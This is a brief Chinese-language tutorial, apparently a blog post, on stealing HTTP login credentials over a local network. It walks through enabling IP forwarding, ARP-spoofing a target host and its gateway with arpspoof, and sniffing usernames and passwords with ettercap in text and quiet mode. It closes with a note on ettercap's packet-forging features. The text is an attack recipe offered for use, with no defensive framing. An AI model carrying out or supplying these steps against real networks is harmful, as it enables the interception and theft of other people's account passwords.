首先，http的前提也是基于arp欺骗的，当arp欺骗成功后，方可进行。

具体步骤如下：

1.打开终端，先进行流量的转发：echo  1  >/proc/sys/net/ipv4/ip_forward,而echo这个命令是不会有回显的。所以，我们要用cat命令查看上个路径文件。

cat  /proc/sys/net/ipv4/ip_forward,回显为1则说明命令执行成功。

2.接下来进行arp欺骗：arpspoof –i 网卡 –t 目标ip 目标网关

3.接下来用ettercap进行流量嗅探，对账户密码进行捕捉。

4.打开终端 输入：ettercap  –Tq   -i 网卡

5.成功之后，当目标主机进行http账户密码的登录时  我们的终端就会对其进行账户密码的获取。

 

注：ettercap是LINUX下一个强大的欺骗工具，当然WINDOWS也能用，你能够用飞一般的速度创建和发送伪造的包.让你发送从网络适配 器到应用软件各种级别的包.绑定监听数据到一个本地端口：从一个客户端连接到这个端口并且能够为不知道的协议解码或者把数据插进去(只有在arp为基础模式里才能用)

而上面我们用到的-T  表示启动文本模式 –q 表示安静模式。